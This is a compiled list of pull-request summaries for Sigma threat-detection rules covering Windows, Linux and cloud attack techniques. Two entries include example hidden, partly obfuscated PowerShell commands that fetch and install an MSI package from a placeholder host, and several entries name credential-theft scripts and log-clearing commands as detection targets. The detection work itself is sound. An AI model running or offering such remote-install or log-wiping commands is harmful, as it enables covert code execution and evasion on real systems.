deprecated/windows/win_security_windows_defender_exclusions_write_deleted.yml, rules/windows/builtin/security/win_security_mal_wceaux_dll.yml
Update rules that contain event id 4660 to better correspond to Microsoft log schema.
remove: Windows Defender Exclusion Deleted - deprecated because EventID 4660 does not have ObjectName [Event 4660 - Microsoft](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4660)
fix: WCE wceaux.dll Access - remove Event IDs 4658 and 4660 as they do not have ObjectName [Event 4660 - Microsoft](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4660) [Event 4658 - Microsoft](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4658)
- If your PR adds new rules, please consider following and applying …
=> Update rules that contain EventID 4660

rules/windows/process_creation/proc_creation_win_schtasks_system.yml
update: Schtasks Creation Or Modification With SYSTEM Privileges
CommandLine: "schtasks.exe" /create /f /tn "Microsoft\Office\Office 15 Subscription Heartbeat" /ru SYSTEM /xml "C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\HeartbeatConfig.xml" 
HeartbeatConfig.xml :  d8906306438ac5fa23ed5ecd3764fbebf94fc7748ecc96cc1c12bf8ecd7f67f6
=> Fp schtask

rules/windows/process_creation/proc_creation_win_pua_nimscan.yml
Added new rule that detect execution of nimscan, a  port scanner utility. According to [cyberundergroundfeed](https://x.com/cyberfeeddigest/status/1887041526397587859), various threat actors have been observed abusing this toll.
Note: If you don't think, it is a good rule to stay on a main repository or I think it might be a go for emerging threats.
new: PUA - NimScan Execution
=> Added new rule that detect execution of nimscan, a  port scanner utility

rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml
This PR is based on
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
new: Suspicious WDAC Policy File Creation
=> Feat: Suspicious WDAC Policy File Creation

rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml
fix #5187 
fix: Suspicious Non-Browser Network Communication With Google API
=> Fix dot in filter name

rules/windows/image_load/image_load_clfs_load.yml, rules/windows/network_connection/net_connection_win_python.yml, rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml
new: Potential Common Log File Exploit
fix: Python Initiated Connection
fix: Python Inline Command Execution
=> feat: Potential Common Log File Exploit

rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml, rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml
Added coverage for other ways to represent the ordinals
update: Potential Obfuscated Ordinal Call Via Rundll32
update: Process Memory Dump Via Comsvcs.DLL
=> Added coverage to detect alternative methods of representing ordinal obfuscation attempts.

rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml, rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml
Some spelling corrections
fix: Some spelling corrections
=> docs: typo fixes

rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml
This pull request updates Nslookup PowerShell Download Cradle to include a variation where '-type=txt http' is used instead of the other two conditionals. The -type parameter functions the same way as the existing conditions, ensuring consistent behavior.
Reference: [Microsoft Documentation - NSLookup Set Type](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup-set-type)
update: Nslookup PowerShell Download Cradle - add condition '-type=txt http'
=> Update Nslookup PowerShell Download Cradle Rule with Extended Coverage

rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml, rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml, rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
Updated Anydesk related rules
update: Anydesk Remote Access Software Service Installation
update: Suspicious Binary Writes Via AnyDesk
update: Remote Access Tool - AnyDesk Incoming Connection
update: Remote Access Tool - Anydesk Execution From Suspicious Folder
update: Remote Access Tool - AnyDesk Execution
=> Updated Anydesk related rules

rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml, rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml, rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml, rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml
Veeam-Get-Creds.ps1 script added as a malicious script
update: Malicious PowerShell Scripts - FileCreation
update: Malicious PowerShell Scripts - PoshModule
update: Malicious PowerShell Commandlets - PoshModule
update:  Malicious PowerShell Commandlets - ProcessCreation
Various Threat Actors have been observed abusing this script for password extraction from database
Reference: 
1. https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/
2. https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/
=> Veeam get creds 

deprecated/windows/proc_creation_win_indirect_command_execution_forfiles.yml, deprecated/windows/sysmon_powershell_execution_moduleload.yml
I have fixed a wrong date format (2021/11/5 -> 2021/11/05) and a wrong keyword (obsoletes -> obsolete).
fix: Indirect Command Exectuion via Forfiles - wrong keyword
fix: PowerShell Execution - wrong date format
=> Fixed wrong date format and wrong keyword

rules-emerging-threats/2024/TA/FIN7/proc_creation_win_apt_fin7_exploitation_indicators.yml
Added false positive for proc_creation_win_apt_fin7_exploitation_indicators.yml
update: proc_creation_win_apt_fin7_exploitation_indicators.yml to add false positive
=> Update proc_creation_win_apt_fin7_exploitation_indicators.yml to add false positive

rules/linux/builtin/lnx_buffer_overflows.yml
I revised an old keyword rule that looks for strings in Linux log files indicating buffer overflow attempts in various services. 
update: Buffer Overflow Attempts
see the new URL list
=> refactor: reworked old rule

rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml
Potential Binary Impersonating Sysinternals Tools
update: Potential Binary Impersonating Sysinternals Tools: List of binaries compiled for Arm64 arch added
=> Potential Binary Impersonating Sysinternals Tools

rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml
As Reported by CISA, Akira has used esentutl.exe for copying the browser data. Thus, I have added it in the rule Potential Browser Data Stealing
update: Potential Browser Data Stealing: add esentutl.exe
=> Add esentutl.exe in potential browser data stealing

rules-emerging-threats/2020/Exploits/CVE-2020-1472/proc_creation_win_exploit_cve_2020_1472_zero_poc.yml, rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml, rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml, rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml, rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml, rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml, rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml, rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml, rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml
Updated author formatting in multiple rules for consistency. Added example command line to the PowerShell download cradle rule. Adjusted detection criteria in the PowerShell rule to include 'Invoke' and removed the substring to broaden the scope.
=> The DFIR Report Rule Modifications

README.md
Adds `detection.studio` to README under the community tools section.
This PR adds a community tool called "detection.studio", another converter that converts using pySigma from Sigma to any available SIEM, with pipeline and filter support.
The tool is sponsored by the commercial entity `north.sh`. More information here. https://sinn.io/detection-studio/
n/a
n/a
=> Adds Detection Studio to README.md page

rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml, rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml, rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml, rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml, rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml, rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml, rules/windows/process_creation/proc_creation_win_webshell_chopper.yml, rules/windows/process_creation/proc_creation_win_webshell_hacking.yml, rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml
Adding some missing mitre tags for tactics to rules that have specific techniques enabled.
one example is attack.[t1082](https://attack.mitre.org/techniques/T1082/) that always will require attack.[discovery](https://attack.mitre.org/tactics/TA0007/)
For all rules listed below I've added the discovery tag.
Additionally, for two of the rules, i've added the **execution** and **collection** tags since they have techniques that are part of those tactics.
Update: Bitbucket User Permissions Export Attempt
Update: SharpHound Recon Sessions
Update: HackTool - winPEAS Execution
Update: Exports Critical Registry Keys To a File
Update: Exports Registry Key To a File
Update: Chopper Webshell Process Pattern
Update: HackTool - SharpUp PrivEsc Tool Execution
Update: Webshell Detection With Command …
=> Adding mitre tags to 9 rules

rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml, rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml, rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml, rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml, rules/windows/process_creation/proc_creation_win_hktl_xordump.yml, rules/windows/process_creation/proc_creation_win_renamed_createdump.yml, rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml, rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml
I identified 8 rules that had the T1003.001 tag without having the corresponding tactic tag (attack.credential-access).
here's a pull request to add the missing tag.
update: HackTool - HandleKatz Duplicating LSASS Handle
update: DumpMinitool Execution
update: Suspicious DumpMinitool Execution
update: HackTool - XORDump Execution
update: Renamed CreateDump Utility Execution
update: Potential SysInternals ProcDump Evasion
update: Procdump Execution
update: CreateDump Process Dump
=> Adding missing mitre attack tags for 8 rules.

rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml
update: Potentially Suspicious WDAC Policy File Creation
=> fix: FP related to Potentially Suspicious WDAC Policy File Creation

rules-emerging-threats/2025/Exploits/CVE-2025-4427/web_invanti_epmm_cve_2025_4427_and_cve_2025_4428.yml
Added new emerging threat rule to detect potential exploitation of pre-auth RCE vulnerability of Ivanti EPMM
new: Potential Exploitation of CVE-2025-4427/4428 Ivanti EPMM Pre-Auth RCE
=> feat: CVE-2025-4427/4428 Pre-Auth RCE in Ivanti EPMM

rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml, rules/category/database/db_anomalous_query.yml, rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml, rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml, rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml, rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml, rules/windows/builtin/security/win_security_possible_dc_shadow.yml, rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml, rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml, rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml, rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml, rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml, rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml, rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml, rules/windows/registry/registry_event/registry_event_mal_azorult.yml, rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml, rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml, rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml
Revising Mitre tags for a bunch of rules. I'm focusing on correcting inconsistencies with Tactics/techniques right now, but in some case I've removed a tag and added what should be more correct.
Update: Suspicious SQL Query
Update: Windows LAPS Credential Dump From Entra ID
Update: Windows Event Log Access Tampering Via Registry
Update: New Kubernetes Service Account Created
Update: Blue Mockingbird - Registry
Update: CrashControl CrashDump Disabled
Update: Potential Windows Defender Tampering Via Wmic.EXE
Update: Registry Entries For Azorult Malware
Update: Suspicious Windows Service Tampering
Update: Potential Discovery Activity Via Dnscmd.EXE
Update: Hacktool Execution - PE Metadata
Update: Powershell Executed From Headless ConHost Process
Update: Possible DC Shadow Attack
Update: …
=> Updating mitre tags for 18 rules

rules/linux/auditd/lnx_auditd_data_compressed.yml, rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml, rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml, rules/windows/builtin/security/win_security_alert_ruler.yml, rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml, rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml, rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml, rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml
Adding some missing mitre tags for tactics to rules that have specific techniques enabled.
For most of the rules listed below i've added: attack.collection or attack.credential-access because they have a technique tag refers to this tactic.
Update: Hacktool Ruler
Update: Browser Started with Remote Debugging
Update: Potential Data Stealing Via Chromium Headless Debugging
Update: Data Compressed
Update: Disk Image Mounting Via Hdiutil - MacOS
Update: Potential PetitPotam Attack Via EFS RPC Calls
Update: Potential SMB Relay Attack Tool Execution
Update: Local Privilege Escalation Indicator TabTip
=> Adding additional mitre tags for 8 rules

rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml, rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml, rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml, rules/windows/builtin/security/win_security_possible_dc_shadow.yml, rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml, rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml, rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml, rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml, rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml, rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml, rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml, rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml, rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml
Adding some missing mitre tags for tactics to rules that have specific techniques enabled.
For most of the rules listed below i've added: attack.defense-evasion, attack.credential-access or attack.command-and-control because they have a technique tag refers to this tactic.
Update: Mount Execution With Hidepid Parameter
Update: Kubernetes Events Deleted
Update: Creation Of Pod In System Namespace
Update: CrashControl CrashDump Disabled
Update: Suspicious Use of CSharp Interactive Console
Update: Suspicious Remote Child Process From Outlook
Update: Renamed BrowserCore.EXE Execution
Update: Potentially Suspicious Rundll32.EXE Execution of UDL File
Update: Outlook EnableUnsafeClientMailRules Setting Enabled
Update: Hiding User Account Via SpecialAccounts Registry Key - CommandLine
Update: …
=> Adding additional mitre tags for 13 rules

.github/workflows/goodlog-tests.yml
=> chore: update evtx-baseline

rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml, rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml
Updating some VMware rules to match Mitre V17
update: proc_creation_lnx_esxcli_vm_kill.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_vsan_discovery.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_system_discovery.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_network_discovery.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_storage_discovery.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_syslog_config_change.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_user_account_creation.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_permission_change_admin.yml - updating MITRE to match v17
update: proc_creation_lnx_esxcli_vm_discovery.yml - updating MITRE to …
=> Updating some vmware rules to match mitre V17

rules/windows/builtin/system/microsoft_windows_wer_systemerrorreporting/win_system_crash_dump_created.yml
This pull requests adds a detection for the creation of a crash dump file on a Windows endpoint.  This is based on research illustrating the sensitive data that can be obtained from crash dump files.
https://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/
new: Crash Dump Created By Operating System
System Event ID 1001
=> Create Detection for Crash Dump Created By Operating System

tests/test_rules.py
If the test fails because of wrong filename used, the error message displays the message to follow the convention and provides the link to sigma specification. The specification link was broken. Thus, I have updated it with right working link.
=> chore: fix broken links

rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml
Detects the use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000),
which disables Address Space Layout Randomization (ASLR) in Linux. This is often used by exploit development, or to bypass memory protection 
A successful use of this flag can reduce the effectiveness of ASLR and make memory attacks more reliable.
new: Disable ASLR Via Personality Syscall - Linux
```json
{
"type": "SYSCALL",
"msg": "audit(1748285017.467:1108)",
"arch": "c000003e",
"syscall": 135,
"per": 40000,
"success": "yes",
"exit": 0,
"a0": 40000,
"a1": "579a478362a0",
"a2": 0,
"a3": 1,
"items": 0,
"ppid": 4365,
"pid": 4470,
"auid": 1000,
"uid": 1000,
"gid": 1000,
"euid": 1000,
"suid": 1000,
"fsuid": 1000,
"egid": 1000,
"sgid": 1000,
"fsgid": 1000,
"tty": "pts1",
"ses": 3,
"comm": "poc",
"exe": …
```
=> Disabling aslr via personality syscall

rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml
The personality() syscall in Linux allows a process to change or query its execution domain or "personality." This affects how the Linux kernel behaves for that process, enabling compatibility modes for legacy applications or altering kernel features such as memory layout and security mitigations.
It is primarily used to:
Maintain compatibility with older or different UNIX/Linux environments.
Modify process behavior for debugging or sandboxing.
Enable or disable certain kernel-level features on a per-process basis.
chore: Disable ASLR Via Personality Syscall - Linux - update reference for PoC
=> add poc for simulate this attack

rules/linux/auditd/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml
Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),
(4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel
ring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation
or privilege escalation. A common technique is running `dmesg -c`, which triggers this syscall internally.
pls note :‌ we must add :
-a always,exit -F arch=b64 -S syslog -F a0=4 -k clear_dmesg_logs
-a always,exit -F arch=b64 -S syslog -F a0=5 -k clear_dmesg_logs
-a always,exit -F arch=b64 -S syslog -F a0=6 -k disable_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=4 -k clear_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=5 -k clear_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=6 -k disable_dmesg_logs
```JSON
{ …
```
=> clean dmesg logs

rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml
This pull request introduces a new Sigma rule designed to detect the malicious use of the Windows Installer COM object for unauthorized MSI installations. 
new: Obfuscated PowerShell MSI Install via WindowsInstaller COM
```
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 5769
```
=> Obfuscated PowerShell MSI Install via WindowsInstaller COM

rules/windows/process_creation/proc_creation_win_certutil_decode.yml
N/A
update: File Decoded From Base64/Hex Via Certutil.EXE - Increase level to `high`
=> Update level for `File Decoded From Base64/Hex Via Certutil.EXE`

rules/linux/process_creation/proc_creation_lnx_local_groups.yml
added some images for entichment the rule
update: Local Groups Discovery - Linux - add tools
=> added some images for entichment the rule

rules/linux/auditd/lnx_auditd_user_discovery.yml
Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc.
Adversaries may use the information from System Owner/User Discovery during automated discovery 
to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
update: System Owner or User Discovery - Linux - add uname
=> added new image for user discovery

rules/linux/auditd/lnx_auditd_web_rce.yml
I refactored the detection logic ( added euid = 33 )  and included the execveat syscall
update: Webshell Remote Command Execution - add execveat and match on euid instead of key
=> refactor logic of detection and add another syscall

rules/linux/auditd/lnx_auditd_discovery_sysinfo_syscall.yml, rules/linux/auditd/lnx_auditd_susp_discovery_sysinfo_syscall.yml
The sysinfo system call in Linux provides a snapshot of key system statistics, such as uptime, load averages, memory usage, and the number of running processes.  its misuse or abuse can still pose a potential attack surface in certain contexts. For example, malware or reconnaissance tools might leverage sysinfo to fingerprint the system—gathering data to determine if it's a viable target.
new: System Info Discovery via Sysinfo Syscall
‍‍‍
```JSON
{
"type": "SYSCALL",
"msg": "audit(1748548996.868:3079)",
"arch": "c000003e",
"syscall": 99,
"success": "yes",
"exit": 0,
"a0": "7ffe0ffa5900",
"a1": "7ffe0ffa5aa8",
"a2": "7ffe0ffa5ab8",
"a3": "7ffe0ffa56a0",
"items": 0,
"ppid": 2707,
"pid": 2984,
"auid": 1000,
"uid": 1000,
"gid": 1000,
"euid": 1000,
"suid": 1000,
"fsuid": 1000,
"egid": 1000, …
```
=> Discovery System Info via sysinfo syscall

rules/windows/registry/registry_set/registry_set_disable_function_user.yml
Add more susp registry modifications associated with feature change of windows internal tools
Various susp registry modification was observed on  LCrypt0rX ransomware variant. I have added those registry in this rule.
update: Disable Internal Tools or Feature in Registry - More registry modifications associated with feature change of windows internal tools added
=> feat: Add more susp registry modifications associated with feature change of windows internal tools

rules-emerging-threats/2019/Malware/Chafer/proxy_malware_chafer_url_pattern.yml, rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_c2_url.yml, rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_download_url.yml, rules-emerging-threats/2019/TA/APT40/proxy_apt_apt40_dropbox_tool_ua.yml, rules-emerging-threats/2020/Exploits/CVE-2020-1048/registry_set_exploit_cve_2020_1048_new_printer_port.yml, rules-emerging-threats/2020/Malware/ComRAT/proxy_malware_comrat_network_indicators.yml, rules-emerging-threats/2020/Malware/FlowCloud/registry_event_malware_flowcloud_markers.yml, rules-emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml, rules-threat-hunting/windows/image_load/image_load_dll_taskschd_by_process_in_potentially_suspicious_location.yml, rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_uncommon_ports.yml, rules-threat-hunting/windows/process_access/proc_access_win_lsass_susp_source_process.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_boinc_execution.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_conhost_headless_execution.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_new_netfirewallrule_allow.yml
Add emerging-threats and threat-hunting  tags
chore:  Add emerging-threats tags
chore:  Add threat-hunting tags
=> Chore add threat tags

rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
Update registry_set rules to add 64 bits Program Files directory in filters for MSOffice.
fix: Common Autorun Keys Modification - add 64 bits Program Files directory in filter
fix: CurrentVersion Autorun Keys Modification - add 64 bits Program Files directory in filter
```
Registry value set:
EventType: SetValue
UtcTime: 2025-06-14 08:47:11.605
ProcessGuid: {cbf7647e-3706-684d-6b4a-020000003300}
ProcessId: 16956
Image: C:\Program Files\Microsoft Office\root\integration\integrator.exe
TargetObject: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}\NoInternetExplorer
Details: 1
User: AUTORITE NT\Système
``` …
=> Update registry_set rules to add 64 bits Program Files directory in filters

README.md
This pull request adds AlphaSOC to the 'Projects or Products that use or integrate Sigma rules' section of README.md file
update: README.md - add 'AlphaSOC' to the 'Projects or Products that use or integrate Sigma rules'
=> Add AlphaSOC to the list of products that use or integrate sigma rules

rules/windows/image_load/image_load_win_trusted_path_bypass.yml, rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml
Moving the suspicious DLL to "c:\windows \system32", Windows is tricked into thinking it's a safe/trusted directory, meaning the process will launch with high integrity and also loads this malicious DLL
new: Trusted Path Bypass via Windows Directory Spoofing
update: TrustedPath UAC Bypass Pattern - Updated Image value
=> Trusted path bypass

rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml
Add 'journalctl --vacuum' to the CommandLine Contains selection in order to also detect the deletion of system logs via the command 'journalctl' with either the parameter 'vacuum-size' or 'vacuum-time'. Since systemd is the most prevalent init-System in Linux and journald is the destination for syslogs in systemd, this addition should add a layer of security.
update: Commands to Clear or Remove the Syslog - detect journald vacuuming
NA
NA
=> detect vacuuming of journald as clearing syslog

rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml
This pull request introduces a new Sigma rule designed to detect the use of the Windows Installer COM object for MSI installations from a remote location.
As [suggested](https://github.com/SigmaHQ/sigma/pull/5436#discussion_r2111543892) this pull request is complementing the [5436](https://github.com/SigmaHQ/sigma/pull/5436) for the remote location detection.
new: PowerShell MSI Install via WindowsInstaller COM From Remote Location
```
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u),'')";
```
=> PowerShell MSI Install via WindowsInstaller COM From Remote Location

rules/windows/process_creation/proc_creation_win_filefix_browsers.yml
This PR adds Command Prompt as a potential child of a browser process as part of a FileFix attack. As per this [demo](https://vimeo.com/1097130170?share=copy#t=0) (sample [here](https://delivr.to?id=f7f8b5f5-3c22-4061-ae83-8386c4121731)), a one-liner can be crafted to chain multiple commands together.
update: FileFix - Suspicious Child Process from Browser File Upload Abuse - add cmd.exe child process
```xml
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Task>1</Task>
<TimeCreated SystemTime="2025-06-28T11:17:22.5629824Z" /> …
```
=> Update `proc_creation_win_filefix_browsers` to include cmd.exe

rules-emerging-threats/2025/Exploits/CVE-2025-49144/proc_creation_win_exploit_cve_2025_49144.yml
Potential Notepad++ CVE-2025-49144 Exploitation
new: Potential Notepad++ CVE-2025-49144 Exploitation
```
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> 
<EventID>1</EventID> 
<Version>5</Version> 
<Level>4</Level> 
<Task>1</Task> 
<Opcode>0</Opcode> 
<Keywords>0x8000000000000000</Keywords> 
<TimeCreated SystemTime="2025-06-26T08:29:18.9802068Z" /> 
<EventRecordID>27138</EventRecordID> 
<Correlation /> 
<Execution ProcessID="3208" ThreadID="1724" /> 
<Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
<Computer>swachchhanda</Computer> 
<Security UserID="S-1-5-18" /> 
</System>
<EventData>
<Data Name="RuleName">-</Data> 
<Data Name="UtcTime">2025-06-26 …
```
=> feat: Potential Notepad++ CVE-2025-49144 Exploitation

rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml, rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml, rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml, rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml, rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml
update: Malicious PowerShell Commandlets - ScriptBlock - add Invoke-PowerDPAPI
update: Malicious PowerShell Scripts - FileCreation - add Invoke-PowerDPAPI
update: Malicious PowerShell Scripts - PoshModule - add Invoke-PowerDPAPI
update: Malicious PowerShell Commandlets - ProcessCreation - add Invoke-PowerDPAPI
update: Malicious PowerShell Commandlets - PoshModule - add Invoke-PowerDPAPI
=> Coverage for Invoke-PowerDPAPI

rules/windows/registry/registry_set/registry_filefix_typedpath_commands.yml, rules/windows/registry/registry_set/registry_set_filefix_typedpath_commands.yml
This adds a new rule for detecting evidence of FileFix based on the population of the most recent TypedPaths registry key.
As new typed paths are created, the url values are incremented (so the value of `url1` becomes `url2` and so on), so this targets the latest value exclusively to prevent reoccurring alerts on historical activity.
An accompanying Sysmon rule group might look like this:
```xml
<RuleGroup name="T1204.004,FileFix" groupRelation="and">
<RegistryEvent onmatch="include">
<TargetObject condition="end with">CurrentVersion\Explorer\TypedPaths\url1</TargetObject>
<Image condition="end with">chrome.exe</Image>
<Image condition="end with">msedge.exe</Image>
<Image condition="end with">brave.exe</Image>
<Image condition="end with">firefox.exe</Image>
</RegistryEvent> 
</RuleGroup> …
```
=> Add Filefix TypedPaths Registry rule

rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml, rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml, rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml, rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml, rules/windows/registry/registry_set/registry_set_treatas_persistence.yml
Fix Logic in some rules that were creating FPs and FNs
fix: Transferring Files with Credential Data via Network Shares - Made the string matching little more specific to avoid FPs
fix: Removal of Potential COM Hijacking Registry Keys - Added Msedge update filter
fix: COM Hijacking via TreatAs - Add filter for integrator.exe
fix: Suspicious Volume Shadow Copy VSS_PS.dll Load - add vssadmin filter
update: System File Execution Location Anomaly - add taskhostw
=> Fix Logic in some rules that were causing FPs and FNs

